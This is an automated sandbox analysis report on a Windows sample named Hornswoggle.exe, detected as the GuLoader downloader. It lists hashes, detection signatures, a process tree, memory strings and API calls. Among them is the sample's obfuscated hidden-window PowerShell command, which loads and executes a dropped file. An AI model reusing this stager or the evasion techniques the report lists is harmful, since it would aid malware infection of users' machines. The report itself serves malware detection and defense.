Windows Analysis Report
Hornswoggle.exe

Overview

General Information

Sample name: Hornswoggle.exe
Analysis ID: 1583356
MD5: 46b874a16ba720eb5d39a0e7f9a87291
SHA1: 9bc00b5338a4fef7db170cb7a8d07dbe28bd416b
SHA256: da2bc53b2715ed2d46c9ffdb184a3f926269e983981a266a7442b3e7ff6b584c

Detection

GuLoader
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sample uses process hollowing technique
Suspicious powershell command line found
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • Hornswoggle.exe (PID: 4028 cmdline: "C:\Users\user\Desktop\Hornswoggle.exe" MD5: 46B874A16BA720EB5D39A0E7F9A87291)
    • powershell.exe (PID: 6400 cmdline: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • msiexec.exe (PID: 7884 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4508 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2152 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 936 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5544 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6164 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5952 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7160 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7868 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7880 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 5912 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6876 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1260 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5052 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2560 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4336 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7240 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2488 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1576 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8020 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7048 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • msiexec.exe (PID: 4580 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1232 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4456 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1196 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4184 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6964 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7588 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5072 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7444 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2880 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 7100 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1312 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 332 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7820 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7764 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 6516 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5056 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.23291877014.000000000C190000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) ", CommandLine: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Hornswoggle.exe", ParentImage: C:\Users\user\Desktop\Hornswoggle.exe, ParentProcessId: 4028, ParentProcessName: Hornswoggle.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) ", ProcessId: 6400, ProcessName: powershell.exe
    No Suricata rule has matched

    AV Detection

    Source: Hornswoggle.exe | ReversingLabs: Detection: 50%
    Source: Hornswoggle.exe | Virustotal: Detection: 72%
    Source: Hornswoggle.exe | Joe Sandbox ML: detected
    Source: Hornswoggle.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Hornswoggle.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: stem.Core.pdbD | source: powershell.exe, 00000002.00000002.23289519078.0000000008B80000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb | source: powershell.exe, 00000002.00000002.23291511273.0000000009400000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_00406167 FindFirstFileA,FindClose
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_00402688 FindFirstFileA
    Source: powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000002.00000002.23278768511.0000000002DD7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microso
    Source: Hornswoggle.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: Hornswoggle.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png4
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
    Source: powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.23281289650.0000000005197000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester4
    Source: powershell.exe, 00000002.00000002.23285471388.00000000060AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000002.00000002.23279024605.00000000032AB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_004049F9
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_004064AE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04FBB788
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_092878F2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_09281220
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_092846D0
    Source: Hornswoggle.exe | Static PE information: invalid certificate
    Source: Hornswoggle.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engine | Classification label: mal76.troj.evad.winEXE@4409/14@0/0
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar
    Source: C:\Users\user\Desktop\Hornswoggle.exe | File created: C:\Users\user\AppData\Roaming\china
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:304:WilStaging_02
    Source: C:\Users\user\Desktop\Hornswoggle.exe | File created: C:\Users\user\AppData\Local\Temp\nshA395.tmp
    Source: Hornswoggle.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\Hornswoggle.exe | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: Hornswoggle.exe | ReversingLabs: Detection: 50%
    Source: Hornswoggle.exe | Virustotal: Detection: 72%
    Source: C:\Users\user\Desktop\Hornswoggle.exe | File read: C:\Users\user\Desktop\Hornswoggle.exe
    Source: unknown | Process created: C:\Users\user\Desktop\Hornswoggle.exe "C:\Users\user\Desktop\Hornswoggle.exe"
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Users\user\Desktop\Hornswoggle.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
